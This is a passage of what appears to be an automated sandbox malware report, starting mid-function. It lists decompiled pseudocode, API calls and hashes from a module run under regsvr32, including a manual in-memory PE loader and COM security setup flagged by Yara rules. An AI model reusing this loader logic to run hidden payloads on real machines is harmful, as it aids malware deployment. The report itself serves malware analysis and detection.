                                                                                                                                                                        				} while (_t41 < _t44);
                                                                                                                                                                        				if(_t51 != 1) {
                                                                                                                                                                        					if(__eflags <= 0) {
                                                                                                                                                                        						goto L22;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t52 = _v140;
                                                                                                                                                                        					L17:
                                                                                                                                                                        					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
                                                                                                                                                                        						lstrcpynW(_v16, _t52, 0x104);
                                                                                                                                                                        					} else {
                                                                                                                                                                        						GetCurrentDirectoryW(0x104,  &_v664);
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						_push(_t52);
                                                                                                                                                                        						_push(0x537c9a0);
                                                                                                                                                                        						_t36 = E05369A5A( &_v664);
                                                                                                                                                                        						_v12 = _t36;
                                                                                                                                                                        						lstrcpynW(_v16, _t36, 0x104);
                                                                                                                                                                        						E05368BF4( &_v12, 0xfffffffe);
                                                                                                                                                                        					}
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t52 = _v144;
                                                                                                                                                                        				goto L17;
                                                                                                                                                                        			}






















                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 0536DE3B
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 0536DE46
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 0536DE88
                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0536DEE1
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 0536DF06
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000104), ref: 0536DF24
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1259063344-0
                                                                                                                                                                        • Opcode ID: 9307ec394432b8c1ba0717a509ce64586df9692f6cda24037da27c4408388773
                                                                                                                                                                        • Instruction ID: f83f149add4643ab1a77be8bdfb31a20d7884d57d696a9189381e5ca56e8dc7f
                                                                                                                                                                        • Opcode Fuzzy Hash: 9307ec394432b8c1ba0717a509ce64586df9692f6cda24037da27c4408388773
                                                                                                                                                                        • Instruction Fuzzy Hash: 8631D271E1411AEACB34AB98C888FADBBB9FF15310F14895DF406E7158DBB09980CB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0536E66A
                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 0536E672
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0536E686
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0536E701
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0536E704
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0536E709
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$AllocFree
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 344208780-0
                                                                                                                                                                        • Opcode ID: 5e31f53577aae7c95c8fbc3248d45b3b4418236810402299d24b83b98d35d671
                                                                                                                                                                        • Instruction ID: 55ee6286886b8bec9d73e7d0610f603ed1904288bd22e7d64ad6d0851c2f02e9
                                                                                                                                                                        • Opcode Fuzzy Hash: 5e31f53577aae7c95c8fbc3248d45b3b4418236810402299d24b83b98d35d671
                                                                                                                                                                        • Instruction Fuzzy Hash: A921FD75D00218BFDB10DFA9CC88DAFBBBDFF48254B108499F505AB250DA71AE05DB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 20%
                                                                                                                                                                        			E05373D66(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
                                                                                                                                                                        				signed int _v5;
                                                                                                                                                                        				signed short _v12;
                                                                                                                                                                        				intOrPtr* _v16;
                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                        				signed int* _v24;
                                                                                                                                                                        				unsigned int _v28;
                                                                                                                                                                        				signed short* _v32;
                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                        				intOrPtr* _v48;
                                                                                                                                                                        				signed short* _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				unsigned int _v60;
                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                        				_Unknown_base(*)()* _v68;
                                                                                                                                                                        				signed int _v72;
                                                                                                                                                                        				intOrPtr _v76;
                                                                                                                                                                        				intOrPtr _v80;
                                                                                                                                                                        				intOrPtr _v84;
                                                                                                                                                                        				unsigned int _v88;
                                                                                                                                                                        				intOrPtr _v92;
                                                                                                                                                                        				signed int _v96;
                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                        				intOrPtr _v104;
                                                                                                                                                                        				intOrPtr _v108;
                                                                                                                                                                        				intOrPtr _v112;
                                                                                                                                                                        				CHAR* _v116;
                                                                                                                                                                        				signed int _v120;
                                                                                                                                                                        				intOrPtr _v124;
                                                                                                                                                                        				signed int _v128;
                                                                                                                                                                        				signed int _v132;
                                                                                                                                                                        				signed int _t216;
                                                                                                                                                                        				signed int _t233;
                                                                                                                                                                        				void* _t273;
                                                                                                                                                                        				signed int _t278;
                                                                                                                                                                        				signed int _t280;
                                                                                                                                                                        				intOrPtr _t320;
                                                                                                                                                                        
                                                                                                                                                                        				_v44 = _v44 & 0x00000000;
                                                                                                                                                                        				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                        				_v20 = _v84;
                                                                                                                                                                        				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
                                                                                                                                                                        				_v64 = _t320;
                                                                                                                                                                        				if(_t320 == 0) {
                                                                                                                                                                        					L13:
                                                                                                                                                                        					while(0 != 0) {
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(8);
                                                                                                                                                                        					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
                                                                                                                                                                        						L35:
                                                                                                                                                                        						if(_a16 == 0) {
                                                                                                                                                                        							L54:
                                                                                                                                                                        							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
                                                                                                                                                                        							while(0 != 0) {
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_a12 != 0) {
                                                                                                                                                                        								 *_a12 = _v80;
                                                                                                                                                                        							}
                                                                                                                                                                        							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
                                                                                                                                                                        							_v124 = _v80(_a4, 1, _a8);
                                                                                                                                                                        							while(0 != 0) {
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_v124 != 0) {
                                                                                                                                                                        								if(_v44 == 0) {
                                                                                                                                                                        									L77:
                                                                                                                                                                        									return 1;
                                                                                                                                                                        								}
                                                                                                                                                                        								if(_a20 != 1) {
                                                                                                                                                                        									if(_a20 != 2) {
                                                                                                                                                                        										L75:
                                                                                                                                                                        										while(0 != 0) {
                                                                                                                                                                        										}
                                                                                                                                                                        										goto L77;
                                                                                                                                                                        									}
                                                                                                                                                                        									while(0 != 0) {
                                                                                                                                                                        									}
                                                                                                                                                                        									_v132 = _v44;
                                                                                                                                                                        									goto L75;
                                                                                                                                                                        								}
                                                                                                                                                                        								while(0 != 0) {
                                                                                                                                                                        								}
                                                                                                                                                                        								_v44();
                                                                                                                                                                        								goto L75;
                                                                                                                                                                        							}
                                                                                                                                                                        							while(0 != 0) {
                                                                                                                                                                        							}
                                                                                                                                                                        							return 0;
                                                                                                                                                                        						}
                                                                                                                                                                        						while(0 != 0) {
                                                                                                                                                                        						}
                                                                                                                                                                        						_push(8);
                                                                                                                                                                        						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
                                                                                                                                                                        							goto L54;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v128 = 0x80000000;
                                                                                                                                                                        						_t216 = 8;
                                                                                                                                                                        						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
                                                                                                                                                                        						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
                                                                                                                                                                        						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
                                                                                                                                                                        						_v104 =  *((intOrPtr*)(_v76 + 0x18));
                                                                                                                                                                        						while(0 != 0) {
                                                                                                                                                                        						}
                                                                                                                                                                        						_v40 = _v40 & 0x00000000;
                                                                                                                                                                        						while(_v40 < _v104) {
                                                                                                                                                                        							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
                                                                                                                                                                        							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
                                                                                                                                                                        							if(lstrcmpA(_v116, _a16) != 0) {
                                                                                                                                                                        								_v40 = _v40 + 1;
                                                                                                                                                                        								continue;
                                                                                                                                                                        							}
                                                                                                                                                                        							while(0 != 0) {
                                                                                                                                                                        							}
                                                                                                                                                                        							_v44 = _v120;
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_v44 != 0) {
                                                                                                                                                                        							goto L54;
                                                                                                                                                                        						}
                                                                                                                                                                        						while(0 != 0) {
                                                                                                                                                                        						}
                                                                                                                                                                        						return 0xffffffff;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v96 = 0x80000000;
                                                                                                                                                                        					_t233 = 8;
                                                                                                                                                                        					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
                                                                                                                                                                        					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                                                                                                                                                        						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                        						if(_v36 == 0) {
                                                                                                                                                                        							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_v36 != 0) {
                                                                                                                                                                        							if( *_v16 == 0) {
                                                                                                                                                                        								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_v24 =  *_v16 + _a4;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v72 = _v72 & 0x00000000;
                                                                                                                                                                        							while( *_v24 != 0) {
                                                                                                                                                                        								if(( *_v24 & _v96) == 0) {
                                                                                                                                                                        									_v100 =  *_v24 + _a4;
                                                                                                                                                                        									_v68 = GetProcAddress(_v36, _v100 + 2);
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
                                                                                                                                                                        								}
                                                                                                                                                                        								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                                                                                                                                                        									 *_v24 = _v68;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
                                                                                                                                                                        								}
                                                                                                                                                                        								_v24 =  &(_v24[1]);
                                                                                                                                                                        								_v72 = _v72 + 4;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v16 = _v16 + 0x14;
                                                                                                                                                                        							continue;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t273 = 0xfffffffd;
                                                                                                                                                                        							return _t273;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L35;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t278 = 8;
                                                                                                                                                                        				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
                                                                                                                                                                        				_t280 = 8;
                                                                                                                                                                        				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
                                                                                                                                                                        				while(0 != 0) {
                                                                                                                                                                        				}
                                                                                                                                                                        				while(_v56 > 0) {
                                                                                                                                                                        					_v28 = _v52[2];
                                                                                                                                                                        					_v56 = _v56 - _v28;
                                                                                                                                                                        					_v28 = _v28 - 8;
                                                                                                                                                                        					_v28 = _v28 >> 1;
                                                                                                                                                                        					_v32 =  &(_v52[4]);
                                                                                                                                                                        					_v92 = _a4 +  *_v52;
                                                                                                                                                                        					_v60 = _v28;
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_v88 = _v60;
                                                                                                                                                                        						_v60 = _v60 - 1;
                                                                                                                                                                        						if(_v88 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                                                                                                                                                        						_v12 =  *_v32 & 0xfff;
                                                                                                                                                                        						_v48 = (_v12 & 0x0000ffff) + _v92;
                                                                                                                                                                        						if((_v5 & 0x000000ff) != 3) {
                                                                                                                                                                        							if((_v5 & 0x000000ff) == 0xa) {
                                                                                                                                                                        								 *_v48 =  *_v48 + _v64;
                                                                                                                                                                        							}
                                                                                                                                                                        						} else {
                                                                                                                                                                        							 *_v48 =  *_v48 + _v64;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v32 =  &(_v32[1]);
                                                                                                                                                                        					}
                                                                                                                                                                        					_v52 = _v32;
                                                                                                                                                                        				}
                                                                                                                                                                        				goto L13;
                                                                                                                                                                        			}









































                                                                                                                                                                        0x05373ef5
                                                                                                                                                                        0x05373ef7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05373ef7
                                                                                                                                                                        0x05373ef3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05373eb6
                                                                                                                                                                        0x05373d99
                                                                                                                                                                        0x05373da7
                                                                                                                                                                        0x05373dac
                                                                                                                                                                        0x05373db7
                                                                                                                                                                        0x05373dba
                                                                                                                                                                        0x05373dbe
                                                                                                                                                                        0x05373dc0
                                                                                                                                                                        0x05373dd0
                                                                                                                                                                        0x05373dd9
                                                                                                                                                                        0x05373de2
                                                                                                                                                                        0x05373dea
                                                                                                                                                                        0x05373df3
                                                                                                                                                                        0x05373dfe
                                                                                                                                                                        0x05373e04
                                                                                                                                                                        0x05373e07
                                                                                                                                                                        0x05373e0a
                                                                                                                                                                        0x05373e11
                                                                                                                                                                        0x05373e18
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05373e23
                                                                                                                                                                        0x05373e31
                                                                                                                                                                        0x05373e3c
                                                                                                                                                                        0x05373e46
                                                                                                                                                                        0x05373e5e
                                                                                                                                                                        0x05373e6b
                                                                                                                                                                        0x05373e6b
                                                                                                                                                                        0x05373e48
                                                                                                                                                                        0x05373e53
                                                                                                                                                                        0x05373e53
                                                                                                                                                                        0x05373e72
                                                                                                                                                                        0x05373e72
                                                                                                                                                                        0x05373e7a
                                                                                                                                                                        0x05373e7a
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 05373ECD
                                                                                                                                                                        • LoadLibraryA.KERNEL32(00000000), ref: 05373EE6
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 05373F42
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 05373F61
                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00000000), ref: 05374052
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1872726118-0
                                                                                                                                                                        • Opcode ID: 0a62ef6bc70dac1ca1c843e113c172e25b978530a6e991ba6b239f9ccecd6feb
                                                                                                                                                                        • Instruction ID: dfa52ef99f024772f3da409b918fc223a385c4a83dad09275d661cb06c8de55a
                                                                                                                                                                        • Opcode Fuzzy Hash: 0a62ef6bc70dac1ca1c843e113c172e25b978530a6e991ba6b239f9ccecd6feb
                                                                                                                                                                        • Instruction Fuzzy Hash: BEE1BE75E0420DDFCF24CFA8C980AADBBB5FF08354F148569E816AB691D778A941CF60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                        • API String ID: 0-2132903582
                                                                                                                                                                        • Opcode ID: f237bf9add98f938ac061c266e0ffe872478916ecd617426cd8895152788d944
                                                                                                                                                                        • Instruction ID: 5d1783628ab0cf1d384139a7a579d98b70a723e0f1b625c7a82eb0858e2227d0
                                                                                                                                                                        • Opcode Fuzzy Hash: f237bf9add98f938ac061c266e0ffe872478916ecd617426cd8895152788d944
                                                                                                                                                                        • Instruction Fuzzy Hash: 94411737E1430DA7DB388E689D9DBBE7A6EEF81210F140125FD07E6640E3ADC960C691
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E0536E400(void* __ecx) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				char* _t15;
                                                                                                                                                                        				intOrPtr* _t16;
                                                                                                                                                                        				void* _t21;
                                                                                                                                                                        				intOrPtr* _t23;
                                                                                                                                                                        				intOrPtr* _t24;
                                                                                                                                                                        				intOrPtr* _t25;
                                                                                                                                                                        				void* _t30;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        
                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                                                                                                                                                        				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                                                                                                                                                        				_t15 =  &_v12;
                                                                                                                                                                        				__imp__CoCreateInstance(0x537c868, 0, 1, 0x537c878, _t15);
                                                                                                                                                                        				if(_t15 < 0) {
                                                                                                                                                                        					L5:
                                                                                                                                                                        					_t23 = _v8;
                                                                                                                                                                        					if(_t23 != 0) {
                                                                                                                                                                        						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t24 = _v12;
                                                                                                                                                                        					if(_t24 != 0) {
                                                                                                                                                                        						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t16 = 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					__imp__#2(__ecx);
                                                                                                                                                                        					_t25 = _v12;
                                                                                                                                                                        					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                                                                                                                                                        					if(_t21 < 0) {
                                                                                                                                                                        						goto L5;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                                                                                                                                                        						if(_t21 < 0) {
                                                                                                                                                                        							goto L5;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t16 = E05368BDE(8);
                                                                                                                                                                        							if(_t16 == 0) {
                                                                                                                                                                        								goto L5;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                                                                                                                                                        								 *_t16 = _v8;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t16;
                                                                                                                                                                        			}













                                                                                                                                                                        0x0536e462
                                                                                                                                                                        0x0536e4b3

                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,0536E731,000009DA,00000000,?,00000000), ref: 0536E413
                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0536E731,000009DA,00000000,?,00000000), ref: 0536E424
                                                                                                                                                                        • CoCreateInstance.OLE32(0537C868,00000000,00000001,0537C878,?,?,0536E731,000009DA,00000000,?,00000000), ref: 0536E43B
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0536E446
                                                                                                                                                                        • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0536E731,000009DA,00000000,?,00000000), ref: 0536E471
                                                                                                                                                                          • Part of subcall function 05368BDE: RtlAllocateHeap.NTDLL(00000008,?,?,0536959D,00000100,?,05366507), ref: 05368BEC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1610782348-0
                                                                                                                                                                        • Opcode ID: 0319c427ca39165f4390bd7759e23ec74cfe3beaae9e813ab894f726c3be2234
                                                                                                                                                                        • Instruction ID: 7676f7e30873d9a5aae97a6fa6bcf3ad66fa6b9a59de1304eb1bc2d073812702
                                                                                                                                                                        • Opcode Fuzzy Hash: 0319c427ca39165f4390bd7759e23ec74cfe3beaae9e813ab894f726c3be2234
                                                                                                                                                                        • Instruction Fuzzy Hash: E9217C34A14248BBDB358B66CC4DE5BBFBCEFC2B15F00815CB501AA294CAB09A00D630
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                        			E05373379(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                                                                                                                                                        				signed int _t12;
                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                        				void* _t30;
                                                                                                                                                                        				char* _t31;
                                                                                                                                                                        				char* _t33;
                                                                                                                                                                        				char* _t35;
                                                                                                                                                                        				char* _t37;
                                                                                                                                                                        				char* _t38;
                                                                                                                                                                        				long long* _t40;
                                                                                                                                                                        
                                                                                                                                                                        				_t30 = __edi;
                                                                                                                                                                        				_t12 = _a20;
                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                        					_t12 = 0x11;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t35 = _a4;
                                                                                                                                                                        				_push(_t25);
                                                                                                                                                                        				 *_t40 = _a12;
                                                                                                                                                                        				_push(_t12);
                                                                                                                                                                        				_push("%.*g");
                                                                                                                                                                        				_push(_a8);
                                                                                                                                                                        				_push(_t35);
                                                                                                                                                                        				L053734D2();
                                                                                                                                                                        				_t23 = _t12;
                                                                                                                                                                        				if(_t23 < 0 || _t23 >= _a8) {
                                                                                                                                                                        					L16:
                                                                                                                                                                        					_t13 = _t12 | 0xffffffff;
                                                                                                                                                                        					goto L17;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					E05373352(_t12, _t35);
                                                                                                                                                                        					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
                                                                                                                                                                        						L8:
                                                                                                                                                                        						_push(_t30);
                                                                                                                                                                        						_t37 = strchr(_t35, 0x65);
                                                                                                                                                                        						_t31 = _t37;
                                                                                                                                                                        						if(_t37 == 0) {
                                                                                                                                                                        							L15:
                                                                                                                                                                        							_t13 = _t23;
                                                                                                                                                                        							L17:
                                                                                                                                                                        							return _t13;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t38 = _t37 + 1;
                                                                                                                                                                        						_t33 = _t31 + 2;
                                                                                                                                                                        						if( *_t38 == 0x2d) {
                                                                                                                                                                        							_t38 = _t33;
                                                                                                                                                                        						}
                                                                                                                                                                        						while( *_t33 == 0x30) {
                                                                                                                                                                        							_t33 = _t33 + 1;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t33 != _t38) {
                                                                                                                                                                        							E05368CE0(_t38, _t33, _t23 - _t33 + _a4);
                                                                                                                                                                        							_t23 = _t23 + _t38 - _t33;
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L15;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t6 = _t23 + 3; // 0x5371b64
                                                                                                                                                                        						_t12 = _t6;
                                                                                                                                                                        						if(_t12 >= _a8) {
                                                                                                                                                                        							goto L16;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t35[_t23] = 0x302e;
                                                                                                                                                                        						( &(_t35[2]))[_t23] = 0;
                                                                                                                                                                        						_t23 = _t23 + 2;
                                                                                                                                                                        						goto L8;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        			}














                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strchr$_snprintf
                                                                                                                                                                        • String ID: %.*g
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                                        			E0536377F(void* __fp0) {
                                                                                                                                                                        				signed int _v144;
                                                                                                                                                                        				signed int _v152;
                                                                                                                                                                        				char _v160;
                                                                                                                                                                        				char _v164;
                                                                                                                                                                        				char _v168;
                                                                                                                                                                        				signed int _v172;
                                                                                                                                                                        				char _v176;
                                                                                                                                                                        				intOrPtr _v180;
                                                                                                                                                                        				signed int _v184;
                                                                                                                                                                        				signed int _v188;
                                                                                                                                                                        				signed int _v192;
                                                                                                                                                                        				signed int _v196;
                                                                                                                                                                        				char _v200;
                                                                                                                                                                        				signed int _v204;
                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                                        				signed int _t80;
                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                        				void* _t102;
                                                                                                                                                                        				void* _t103;
                                                                                                                                                                        				unsigned int* _t104;
                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                        				signed int _t113;
                                                                                                                                                                        				void* _t118;
                                                                                                                                                                        				intOrPtr _t124;
                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                        				intOrPtr _t129;
                                                                                                                                                                        				intOrPtr _t132;
                                                                                                                                                                        				void* _t133;
                                                                                                                                                                        				void* _t137;
                                                                                                                                                                        				signed int _t146;
                                                                                                                                                                        				signed int _t148;
                                                                                                                                                                        				signed short* _t149;
                                                                                                                                                                        				signed int _t159;
                                                                                                                                                                        				intOrPtr* _t183;
                                                                                                                                                                        				void* _t187;
                                                                                                                                                                        				void* _t188;
                                                                                                                                                                        				void* _t189;
                                                                                                                                                                        				signed short* _t192;
                                                                                                                                                                        				void* _t196;
                                                                                                                                                                        				signed int _t199;
                                                                                                                                                                        				signed int _t200;
                                                                                                                                                                        				signed int _t203;
                                                                                                                                                                        				signed int _t204;
                                                                                                                                                                        				char _t205;
                                                                                                                                                                        				signed int _t206;
                                                                                                                                                                        				void* _t208;
                                                                                                                                                                        				void* _t214;
                                                                                                                                                                        				void* _t221;
                                                                                                                                                                        
                                                                                                                                                                        				_t221 = __fp0;
                                                                                                                                                                        				_t208 = (_t206 & 0xfffffff8) - 0xac;
                                                                                                                                                                        				_v144 = 0;
                                                                                                                                                                        				_v172 = 0;
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					_t72 =  *0x537f818; // 0x546f8b0
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push( *0x537f804);
                                                                                                                                                                        					_v152 = 0;
                                                                                                                                                                        					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(0);
                                                                                                                                                                        					_push( &_v160);
